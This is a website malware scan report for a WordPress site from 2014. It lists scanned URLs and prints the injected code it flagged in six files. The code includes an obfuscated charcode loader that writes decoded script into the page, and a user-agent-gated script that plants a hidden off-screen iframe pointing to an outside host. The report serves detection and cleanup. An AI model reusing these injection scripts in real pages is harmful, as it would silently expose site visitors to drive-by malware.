New scan:

Malware Scanner report for certaprotruth.com

Malicious/Suspicious/Total urls checked
6/0/16
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/20
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.certaprotruth.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Dec 2014 18:21:47 GMT
Location: http://certaprotruth.com/
Server: Apache/2.2.15 (CentOS)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://certaprotruth.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
clean
http://certaprotruth.com/
200 OK
Content-Length: 125975
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _gw1 = [];
_gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_gw1.push(['_setPageId', '6918518510413211618916516918118018617118018617417116717']);
_gw1.push(['_setOption', '0171184193182181185175186175181180128167168185181178187']);
_gw1.push(['_setOption', '1861711291691781751821281841711691861101221241241821901']);
_gw1.push(['_setOption', '1416718718618111416718718618111412212412418219011112919']);
_gw1.push(['_setPageId', '5130117185186191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:HideMe-F [Trj]

http://certaprotruth.com/wp-includes/js/jquery/jquery.js?ver=1.10.2
200 OK
Content-Length: 95528
Content-Type: text/javascript
clean
http://certaprotruth.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
200 OK
Content-Length: 2457
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (g_haystack, g_needle, g_offset) {
var haystack = (g_haystack + '').toLowerCase();
var needle = (g_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, g_offset)) !== -1) {
return index;
}
return false;
}
function user_agenta(){
var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I
... 690 bytes are skipped ...
codeURIComponent(matcht[1]) : undefined;
}
if (!user_agenta()) {
var cookie = getCookie('misspronto18auejtlanerau');
if (cookie == undefined) {
setCookie('misspronto18auejtlanerau', true, 260000);
document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>');
}
}
})();

Decoded script:


<iframe src="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://certaprotruth.com/wp-content/plugins/mailchimp/js/scrollTo.js?ver=1.2.9
200 OK
Content-Length: 4709
Content-Type: text/javascript
clean
http://certaprotruth.com/wp-includes/js/jquery/jquery.form.min.js?ver=3.37.0
200 OK
Content-Length: 2457
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (g_haystack, g_needle, g_offset) {
var haystack = (g_haystack + '').toLowerCase();
var needle = (g_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, g_offset)) !== -1) {
return index;
}
return false;
}
function user_agenta(){
var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I
... 690 bytes are skipped ...
codeURIComponent(matcht[1]) : undefined;
}
if (!user_agenta()) {
var cookie = getCookie('misspronto18auejtlanerau');
if (cookie == undefined) {
setCookie('misspronto18auejtlanerau', true, 260000);
document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>');
}
}
})();

Decoded script:


<iframe src="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

http://certaprotruth.com/wp-content/plugins/mailchimp/js/mailchimp.js?ver=1.2.9
200 OK
Content-Length: 3445
Content-Type: text/javascript
clean
http://certaprotruth.com/wp-content/plugins/growyn-search/includes/onclick.js?ver=3.8.5
200 OK
Content-Length: 2457
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (g_haystack, g_needle, g_offset) {
var haystack = (g_haystack + '').toLowerCase();
var needle = (g_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, g_offset)) !== -1) {
return index;
}
return false;
}
function user_agenta(){
var blockLista = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrome','I
... 690 bytes are skipped ...
codeURIComponent(matcht[1]) : undefined;
}
if (!user_agenta()) {
var cookie = getCookie('misspronto18auejtlanerau');
if (cookie == undefined) {
setCookie('misspronto18auejtlanerau', true, 260000);
document.write('<'+'i'+'fra'+'me'+' s'+'r'+'c="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="po'+'si'+'tion'+':absolute'+';'+'left'+':'+'-1350px;'+'top:'+'-1350px;" height="140" width="140"></i'+'f'+'r'+'am'+'e'+'>');
}
}
})();

Decoded script:


<iframe src="http://teneta.mon-pang.com/tewyreutrutryi12.html" style="position:absolute;left:-1350px;top:-1350px;" height="140" width="140"></iframe>

Antivirus reports:

Sophos
Troj/JSRedir-LH

https://apis.google.com/js/plusone.js
200 OK
Content-Length: 12798
Content-Type: application/javascript
clean
http://widgets.twimg.com/j/2/widget.js
200 OK
Content-Length: 1489
Content-Type: application/javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 19470
Content-Type: text/javascript
clean
http://www.statcounter.com/counter/counter_xhtml.js
200 OK
Content-Length: 21363
Content-Type: application/x-javascript
clean
http://www.certaprotruth.com/test404page.js
HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Mon, 29 Dec 2014 18:21:56 GMT
Pragma: no-cache
Location: http://certaprotruth.com/test404page.js
Server: Apache/2.2.15 (CentOS)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://certaprotruth.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
clean
http://certaprotruth.com/test404page.js
HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, max-age=0
Connection: close
Date: Mon, 29 Dec 2014 18:21:56 GMT
Pragma: no-cache
Location: http://certaprotruth.com?s=test404page.js&search_404=1
Server: Apache/2.2.15 (CentOS)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
X-Pingback: http://certaprotruth.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
clean
http://certaprotruth.com?s=test404page.js&search_404=1/
200 OK
Content-Length: 17336
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _gw1 = [];
_gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_gw1.push(['_setPageId', '6918518510413211618916516918118018617118018617417116717']);
_gw1.push(['_setOption', '0171184193182181185175186175181180128167168185181178187']);
_gw1.push(['_setOption', '1861711291691781751821281841711691861101221241241821901']);
_gw1.push(['_setOption', '1416718718618111416718718618111412212412418219011112919']);
_gw1.push(['_setPageId', '5130117185186191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:HideMe-F [Trj]

http://certaprotruth.com?s=test404page.js&search_404=1/test404page.js
200 OK
Content-Length: 17336
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _gw1 = [];
_gw1.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
_gw1.push(['_setPageId', '6918518510413211618916516918118018617118018617417116717']);
_gw1.push(['_setOption', '0171184193182181185175186175181180128167168185181178187']);
_gw1.push(['_setOption', '1861711291691781751821281841711691861101221241241821901']);
_gw1.push(['_setOption', '1416718718618111416718718618111412212412418219011112919']);
_gw1.push(['_setPageId', '5130117185186191178171132']);
var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw1.length; v++) t += _gw1[v][1];l=t.length;
while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70);
document.write(z);

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:HideMe-F [Trj]


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: certaprotruth.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Dec 2014 18:21:47 GMT
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Pingback: http://certaprotruth.com/xmlrpc.php
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: certaprotruth.com
Referer: http://www.google.com/search?q=certaprotruth.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=certaprotruth.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://certaprotruth.com/

Result: certaprotruth.com is not infected or malware details are not published yet.